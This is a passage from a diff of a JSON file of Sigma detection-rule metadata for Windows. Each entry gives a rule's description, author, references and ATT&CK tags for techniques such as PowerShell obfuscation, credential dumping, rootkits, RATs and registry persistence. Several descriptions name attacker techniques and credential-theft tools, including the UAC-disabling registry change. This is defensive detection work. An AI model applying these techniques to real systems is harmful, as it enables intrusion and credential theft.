"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - 
"refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", - "value": "Invoke-Obfuscation Via Stdin - System" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", - "value": "Invoke-Obfuscation Via Use Clip - System" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", - "value": "Invoke-Obfuscation 
Via Use MSHTA - System" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "value": "Invoke-Obfuscation Via Use Rundll32 - System" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" - }, - { - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml", - 
"level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" - }, - { - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "meta": { - "author": "Sittikorn S, Tim Shelton", - "creation_date": "2022/05/11", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_krbrelayup_service_installation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "value": "KrbRelayUp Service Installation" - }, - { - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_lpe_indicators_tabtip.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/antonioCoco/JuicyPotatoNG", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" - ], - "tags": [ - 
"attack.execution", - "attack.t1557.001" - ] - }, - "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", - "value": "Local Privilege Escalation Indicator TabTip" - }, - { - "description": "Detects the reporting of NTLMv1 being used between a client and server", - "meta": { - "author": "Tim Shelton", - "creation_date": "2022/04/26", - "falsepositive": [ - "Environments that use NTLMv1" - ], - "filename": "win_system_lsasrv_ntlmv1.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1550/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" - ], - "tags": [ - "attack.execution", - "attack.t1550.002", - "attack.s0363" - ] - }, - "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", - "value": "NTLMv1 Logon Between Client and Server" - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "meta": { - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2017/03/05", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "filename": "win_system_mal_creddumper.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ] - }, - "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "value": "Credential Dumping Tools Service Execution - System" - }, - { - "description": "Detects the 
use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Highly unlikely" - ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ] - }, - "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" - }, - { - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_moriya_rootkit.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1546.015" ] }, - "uuid": 
"25b9c01c-350d-4b95-bed1-836d04a4f324", - "value": "Moriya Rootkit - System" + "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "value": "Windows Registry Persistence COM Key Linking" }, { - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "description": "Detects new registry key created by Ursnif malware.", "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/11", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_system_ntfs_vuln_exploit.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/jonasLyk/status/1347900440000811010", - "https://twitter.com/wdormann/status/1347958161609809921", - "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.001" - ] - }, - "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "value": "NTFS Vulnerability Exploitation" - }, - { - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/06/10", + "author": "megan201296", + "creation_date": "2019/02/13", "falsepositive": [ "Unknown" ], - "filename": "win_system_pcap_drivers.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_add_mal_ursnif.yml", + "level": "high", + "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + 
"https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" ], "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.execution", + "attack.t1112" ] }, - "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", - "value": "Windows Pcap Drivers" + "uuid": "21f17060-b282-4249-ade0-589ea3591558", + "value": "Ursnif" }, { - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", "meta": { - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": "No established falsepositives", - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", - "level": "critical", - "logsource.category": "No established category", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", + "level": "medium", + "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://www.secura.com/blog/zero-logon", - "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + 
"https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" ], "tags": [ - "attack.t1210", + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", + "value": "Sysinternals SDelete Registry Keys" + }, + { + "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Legitimate use of SysInternals tools" + ], + "filename": "registry_add_susp_sysinternals_eula_accepted.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "value": "Usage of Suspicious Sysinternals Tools" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate new entry added by windows" + ], + "filename": "registry_add_disk_cleanup_handler_new_entry_persistence.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "value": "Persistence Via Disk Cleanup Handler - NewEntry" + }, + { + "description": "Detects the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + 
"attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", + "value": "Usage of Renamed Sysinternals Tools" + }, + { + "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", + "meta": { + "author": "Christopher Peacock", + "creation_date": "2021/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_mal_netwire.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "value": "NetWire RAT Registry Key" + }, + { + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate security products adding their own AMSI providers" + ], + "filename": "registry_add_amsi_providers_persistence.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "value": "Persistence Via New AMSI Providers" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "registry_add_sysinternals_eula_accepted.yml", + "level": "low", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "value": "Usage of Sysinternals Tools - Registry" + }, + { + "description": "Detects creation of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence", "attack.lateral_movement" ] }, - "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", - 
"value": "Zerologon Exploitation Using Well-known Tools" + "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" }, { - "description": "Detects powershell script installed as a Service", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", "meta": { "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", + "creation_date": "2020/10/13", "falsepositive": [ "Unknown" ], - "filename": "win_system_powershell_script_installed_as_service.yml", + "filename": "registry_set_wab_dllpath_reg_change.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "https://twitter.com/Hexacorn/status/991447379864932352", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1218" ] }, - "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "value": "PowerShell Scripts Installed as Services" + "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "value": "Execution DLL of Choice Using WAB.EXE" }, { - "description": "Detects QuarksPwDump clearing access history in hive", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", "meta": { - 
"author": "Florian Roth", - "creation_date": "2017/05/15", + "author": "Sittikorn S, frack113", + "creation_date": "2021/07/16", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ] }, - "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "value": "QuarksPwDump Clearing Access History" + "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits" }, { - "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/08", + "author": "frack113", + "creation_date": "2022/08/19", "falsepositive": [ - "Software installation", - "Software updates" + "Unknown" ], - "filename": "win_system_rare_service_installs.yml", - "level": "low", - "logsource.category": "No established category", + 
"filename": "registry_set_suppress_defender_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "value": "Activate Suppression of Windows Security Center Notifications" + }, + { + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of the dll." + ], + "filename": "registry_set_scrobj_dll_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1546.015" ] }, - "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", - "value": "Rare Service Installations" + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Scrobj.dll COM Hijacking" }, { - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "description": "Detects potential persistence using Appx DebugPath", "meta": { - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", - "creation_date": 
"2019/05/24", - "falsepositive": [ - "Bad connections or network interruptions" - ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/Ekultek/BlueKeep", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ] - }, - "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", - "value": "Potential RDP Exploit CVE-2019-0708" - }, - { - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/11", - "falsepositive": [ - "Legitimate usage of the anydesk tool" - ], - "filename": "win_system_service_install_anydesk.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", - "value": "Anydesk Remote Access Software Service Installation" - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/21", + "author": "frack113", + "creation_date": "2022/07/27", "falsepositive": [ "Unknown" ], - "filename": "win_system_service_install_hacktools.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "Internal Research", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "value": "Hacktool Service Registration or Execution" - }, - { - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/28", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_mesh_agent.yml", + "filename": "registry_set_persistence_appx_debugger.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", + "https://github.com/rootm0s/WinPwnage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1546.015" ] }, - "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", - "value": "Mesh Agent Service Installation" + "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "value": "Windows Registry Persistence DebugPath" }, { - "description": "Detects NetSupport Manager service installation on the target system.", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", + "author": "Tobias Michalski", + "creation_date": "2022/02/24", "falsepositive": [ - 
"Legitimate use of the tool" + "Legitimate disabling of crashdumps" ], - "filename": "win_system_service_install_netsupport_manager.yml", + "filename": "registry_set_crashdump_disabled.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" ], "tags": [ - "attack.persistence" + "attack.t1564", + "attack.t1112" ] }, - "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "value": "NetSupport Manager Service Install" + "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "value": "CrashControl CrashDump Disabled" }, { - "description": "Detects PAExec service installation", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", + "author": "frack113", + "creation_date": 